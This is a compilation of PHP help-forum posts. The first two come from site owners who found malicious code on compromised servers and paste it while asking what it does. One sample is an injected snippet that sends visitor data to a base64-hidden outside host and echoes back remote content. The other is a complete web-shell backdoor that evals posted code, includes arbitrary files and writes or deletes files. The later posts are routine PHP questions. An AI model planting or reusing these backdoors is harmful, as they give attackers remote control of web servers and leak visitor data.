PHP - Has My Site Been Hacked?

The code below was inserted into every single index.php on one of my clients sites.  It went through and every single index.php page (in each folder) had that following code put in.  It was
strange. As far as I can tell there are no FTP logs, besides my own IP.   This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a
full security audit yet.  What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <?
is inserted right after it.  I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange.

Any advice on how this is generally done, and anyone with similar issues?
Code: [Select]
<? require_once('security.inc.php'); ?><?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop.

If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds.

Code: [Select]
<?php //e6b03bed4190733c7534e5c1209b076f

/**
 * @version 2.42
 * 
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        include $code;
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if ($res)
                {
                        $installed[] = $projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);

                if ($res)
                {
                        $removed[] = $projectcode["id"];
                }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
 */
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);
      
        eval($code);
        //return;
}

?>

I have a php form submission on this website: www.judelawllc.com

There are several required fields...and when I try to get around them, I am unable to?? Yet, over the last week...we have been getting upwards of 500 submissions that are completely blank? I don't understand how that is possible...or how to correct it. I have tried to add a captcha to the form to add further protection, but the captcha image is too big for the space I have to put this form. I don't like the layout of this site, but I am stuck with it for now...could you let me know what information I can supply you to help figure out how this is happening?

Thank you in advance!

Hey guys I have a simple question,

I have a Config.php file that connects to mysql database on my server...

Something like this (modified data, of course):


<?php
// database information
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '******';
$dbname = 'databasename';
?>

Can a hacker access those variables? How can I protect this?
Ideas, suggestions?

Thanks in advance!

Hey, friends.  I have some trouble on the server front.  My sites have been hacked, and I need to make sure I've eradicated every trace of this exploit.  I'm looking for a way to search for any and all php files contained in multiple directories with specific names.  For instance, I have found a commonality in relation to where these malicious files are placed, such as:
Code: [Select]
/some/dir/img/somename.phpor:
Code: [Select]
/some/dir/js/somename.php
Is there a way I can easily (e.g. using ssh and the "find" command) locate all files ending in php but only found in directories named "img"?  I can't seem to find anything that would allow me to do this with find, or with a combination of find and grep.  I can't go directory by directory, as some of these img directories are created many levels deep, some even in .svn directories. 

Any and all help is appreciated.  Hackers suck.

I have several "sites" located in my html directory, and each has a "general" access point and an "administrator" access point:

/var/www/html/site1/index.php
/var/www/html/site1/administrator/index.php
/var/www/html/site2/index.php
/var/www/html/site2/administrator/index.php
/var/www/html/site3/index.php
/var/www/html/site3/administrator/index.php

All sites are similar except that data will be specific to site1, site2, or site3, etc.   Users who log onto /var/www/html/siteX/index.php are totally unrelated to those who logon to /var/www/html/siteX/administrator/index.php, will have different logon credentials, are stored in different DB tables, and each should have their own session.  If a user logs off of either the general or administrator site, it should not effect the other site even if they were previously logged on to both on the same PC (and of course not effect other sites). When a user logs off, I would like to destroy their previous cookie and associated session.  Users for either will only use https.  I am using Apache to rewrite https://www.mysite.com/ to https://mysite.com/.  While I named the administrator site "administrator" above, the administrator user has the ability to change the directory name.   I am thinking I need to use session_set_cookie_params to specify where I wish the session cookie to be stored since /var/www/html/siteX/administrator/index.php is a sub-directory to /var/www/html/siteX/index.php, but am not really sure.  Sorry for the cryptic post, but I am not very well versed in this subject. How would you recommend setting up cookies/sessions for this scenario?  Thank you

Hi,

My first post here is a cry for help

I have a Windows 2003 server running IIS6/PHP5, the server hosts multiple web sites.

The problem is include files that are for site A are showing on site B (each site having its own includes as part of the site files in its own site folder), though not every time, its very random, sometimes the correct includes show, sometimes ones from another site on the same server. This only occurs where the include files for both sites have the same name, such as 'inc-header.php' for example.

I can only assume PHP is caching includes and because they have the same name is showing the wrong one on other sites sometimes, if I rename them to something unique then the problem goes away, but its not a practical solution to rename all include files to unique names so I find myself looking for a 'real' fix.

I have a feeling its to do with the include_path in the php.ini, but right now its disabled with a semi-colon, and I don't want to set one as I have no global includes, all includes are site specific.

Any help would be very much appreciated!

Phil

Not sure if I'm trying to achieve something totally crazy here, or if this is something pretty standard. Didn't have much luck with searching as I'm not fully down with all the terms.

(A) I have one site providing an RSS feed.
(B) I have one site I want to search, once for each of the items in the feed A.
(C) I want the results of the search in (B) to be displayed on page (C).

So for example, the feed on (A) says;

apples
bananas
oranges
cheese

I want site (B) to search for each of those terms (by passing the item in the feed (A) to the ?search= part of the URL of that page) and then show the results from THAT search on page C. Bit of a complex one, let me know if you need me to clarify. Thanks for any help! 

now i use this code to show where the visitors came from to my site.

<?php
$referer=$_SERVER['HTTP_REFERER'];
echo $referer;
?>

now, i want to show the  5 latest vistors referer's site url on my site ?

Transferring data from sub-domain.site.com
Reading sub-domain.site.com

What is this all about?
I'm going to put all .. images into a separate sub-domain eg: images.site.com.
This would create a folder inside my public_HTML called "images"

Now when sites have that Transferring data, and Reading... is this .. something relating to what I want. Facebook also does it, and they get their images for the site from a sub domain, how is it all done?

I'm not sure if its entirely PHP, but I hope someone can help.

Thanks

I'm currently running a classified ads site and planning to display my own content from database combined with and external site rss. So here is what i got right now after the db query for the jobs ads (procedural php),

while ($row = mysqli_fetch_array($results, MYSQLI_ASSOC)){


echo '<div class="media margin-none">
<a class="pull-left bg-inverse innerAll text-center" href="#"><img src="'.$foto.'" share_alt="" width="100" height="100"></a>
<div class="media-body innerAll">
<h4 class="media-heading innerT">
<a href="' . $row['title'] .'-da' . $row['id_ad'] . '" class="text-inverse">'. $remuneracion .' &nbsp; ' . substr(ucfirst(strtolower($row['title'])), 0, 53) . '</a> <small class="pull-right label label-default"><i class="fa fa-fw fa-calendar-o"></i> ' . $row['date_created'] . '</small></h4>
<p>' . substr(ucfirst(strtolower($row['description'])), 0, 80) . ' ...</p>';

echo '</div>
</div>
<div class="col-separator-h"></div>';
}

echo pagination($statement,$per_page,$page, $url_filtros, $filtros);
?>

it is the while loop that i use to display ads from my database, what could be the best way to display (in this same loop?) other site's rss feed so i can show my content combined with the external rss? Thanks

Hi I made a new design for my website and I made some changes. I want to use layout for my second site. I'll like to know if my site is easier to browse through now and if you like the design better?. I test my site on internet explorer, chrome, and firefox. It is best to use site on better browsers like firefox and chrome to get a better experience of site. Thanks.   http://adjade.com

This topic has been moved to mod_rewrite.

http://www.phpfreaks.com/forums/index.php?topic=318858.0

How do I only redirect the page when index.php is present?

How can i make echo "<b>Site:</b> ".$req_user_info['site']."<br>"; linkable
The site raw fron the db contains an site url.
Regards